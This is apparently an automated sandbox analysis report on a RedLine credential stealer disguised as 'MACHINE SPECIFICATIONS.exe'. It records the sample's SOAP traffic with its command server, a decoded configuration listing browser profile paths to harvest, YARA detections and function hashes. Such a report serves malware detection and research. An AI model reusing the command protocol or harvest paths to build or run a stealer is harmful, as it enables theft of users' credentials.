May 25, 2022 15:08:10.094213963 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.094347954 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.095715046 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.095748901 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.095777988 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.095803022 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.095839977 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.095854998 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.095869064 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.096021891 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.096049070 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.096076012 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.096105099 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.096359968 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.096391916 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.097748041 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.116472006 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.116679907 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.116858959 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.117141008 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.118310928 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.118526936 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.118762016 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.141443014 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.141499043 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.141531944 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.141674995 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.141742945 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.141980886 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.142074108 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.142146111 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.142240047 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.142314911 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.142388105 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.164194107 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.164242983 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.164346933 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.164515018 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.164591074 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.164668083 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.164757013 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.164830923 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165020943 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165307045 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165335894 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165361881 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165395975 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165422916 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165437937 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.186963081 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.187010050 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.187267065 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.187690020 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480609894 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480658054 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480684996 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480710983 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480736017 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480762005 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480789900 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480814934 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480840921 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480866909 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.507190943 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.550302029 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.699542046 CEST	49768	17910	192.168.2.4	185.222.58.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 25, 2022 15:07:52.603076935 CEST	56076	53	192.168.2.4	8.8.8.8
May 25, 2022 15:07:52.643912077 CEST	60758	53	192.168.2.4	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 25, 2022 15:07:52.603076935 CEST	192.168.2.4	8.8.8.8	0x76f	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
May 25, 2022 15:07:52.643912077 CEST	192.168.2.4	8.8.8.8	0x587c	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 25, 2022 15:07:52.626219034 CEST	8.8.8.8	192.168.2.4	0x76f	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
May 25, 2022 15:07:52.667210102 CEST	8.8.8.8	192.168.2.4	0x587c	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

185.222.58.90:17910

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49758	185.222.58.90	17910	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Timestamp	kBytes transferred	Direction	Data
May 25, 2022 15:07:41.897141933 CEST	1159	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.58.90:17910 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
May 25, 2022 15:07:42.922243118 CEST	1206	IN	HTTP/1.1 100 Continue
May 25, 2022 15:07:42.973870993 CEST	1206	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 25 May 2022 11:07:42 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
May 25, 2022 15:07:50.312830925 CEST	1207	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.58.90:17910 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
May 25, 2022 15:07:50.423234940 CEST	1207	IN	HTTP/1.1 100 Continue
May 25, 2022 15:07:52.078752041 CEST	1208	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 25 May 2022 11:07:51 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49768	185.222.58.90	17910	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Timestamp	kBytes transferred	Direction	Data
May 25, 2022 15:08:06.501405954 CEST	1228	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.58.90:17910 Content-Length: 1134207 Expect: 100-continue Accept-Encoding: gzip, deflate
May 25, 2022 15:08:06.548837900 CEST	1228	IN	HTTP/1.1 100 Continue
May 25, 2022 15:08:09.656524897 CEST	2365	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 25 May 2022 11:08:09 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
May 25, 2022 15:08:09.660119057 CEST	2365	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.58.90:17910 Content-Length: 1134199 Expect: 100-continue Accept-Encoding: gzip, deflate
May 25, 2022 15:08:09.769032001 CEST	2365	IN	HTTP/1.1 100 Continue
May 25, 2022 15:08:10.507190943 CEST	3520	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 25 May 2022 11:08:09 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	15:07:12
Start date:	25/05/2022
Path:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe"
Imagebase:	0x100000
File size:	984576 bytes
MD5 hash:	1AC0E9EEE0868534CFCA46127F5D5753
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Target ID:	3
Start time:	15:07:19
Start date:	25/05/2022
Path:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
Imagebase:	0x100000
File size:	984576 bytes
MD5 hash:	1AC0E9EEE0868534CFCA46127F5D5753
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000000.258987362.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.258987362.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.363334642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.363334642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000000.260395549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.260395549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Target ID:	5
Start time:	15:07:22
Start date:	25/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Execution Graph

Execution Coverage:	18%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	37%
Total number of Nodes:	46
Total number of Limit Nodes:	4

Executed Functions

Function 00F70498 Relevance: 4.3, Strings: 3, Instructions: 542
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hl, xrefs: 00F70912
xA, xrefs: 00F709FC
R, xrefs: 00F707C1

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: Hl$xA$R
API String ID: 0-1150497775
Opcode ID: 2fd8077f260b4176b2fd16f2da863be964d849c00049a681669b034d8be7ade5
Instruction ID: a7631e95be2b54d35cd35956a8bdd091e424bc0efa45d577484cd53f976ad4d8
Opcode Fuzzy Hash: 2fd8077f260b4176b2fd16f2da863be964d849c00049a681669b034d8be7ade5
Instruction Fuzzy Hash: DC129231B005549FCB19DFA8C951EAE77A7EF88304B158069E10AAB3A6CF31DC45EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F77180 Relevance: 2.8, Strings: 2, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hM, xrefs: 00F771C9
fish, xrefs: 00F77196

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: fish$hM
API String ID: 0-2097655512
Opcode ID: 258df00cc9880ca390fe623f7291cc8ec0f472a538408404738e8c5f61bfbd6f
Instruction ID: 8e2985fd75e869e4990f284018c68e6d1df7d124599bcf47846e32a6d62d1a45
Opcode Fuzzy Hash: 258df00cc9880ca390fe623f7291cc8ec0f472a538408404738e8c5f61bfbd6f
Instruction Fuzzy Hash: 4D91C170A143159FCB04EFB5D890AAEB7B2FF84304F00882AE916E7351DB74AD09DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F759C8 Relevance: .8, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb4c63964db81ca6bdcafff9b29ef8d6193f8f000edcab1ffe1485948e7074ef
Instruction ID: 990ba6737efde263a1ca86dc70b139eb9316db7231c550947612631beed7cf67
Opcode Fuzzy Hash: eb4c63964db81ca6bdcafff9b29ef8d6193f8f000edcab1ffe1485948e7074ef
Instruction Fuzzy Hash: FB52E431B046548FCB24DF78C894A7E7BA2AF85714F15C06AE40ADB3A1CB71DC41EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F71E28 Relevance: .7, Instructions: 723COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb7cb94ec7ffec9c8f7f3776a6d2c89ffa36c84155864158427f49fb206a28e
Instruction ID: be23b613f7090efdcb17c4b9b658592a8765938d2d5d92a38f57f24bc03531be
Opcode Fuzzy Hash: 8bb7cb94ec7ffec9c8f7f3776a6d2c89ffa36c84155864158427f49fb206a28e
Instruction Fuzzy Hash: 10528335B001159FCB58DF69C984AAD77B2BF88314F15C06AE80AEB365DB31DC42DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F79B30 Relevance: .5, Instructions: 473COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.274371741.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f70000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a165226e263e2191294d860775e4f1fe78e980812bf4bed0bbb275176d579f
Instruction ID: 2ef5cc2f044a565bffcdad725d05e6e788f35af2672fb780f85bf07a8034ef64
Opcode Fuzzy Hash: e3a165226e263e2191294d860775e4f1fe78e980812bf4bed0bbb275176d579f
Instruction Fuzzy Hash: B802D135A08206CFCB15CF54C580AAEB7F2EF84310F56C46AD409EB261DBB4ED45DB52

Uniqueness

Uniqueness Score: -1.00%

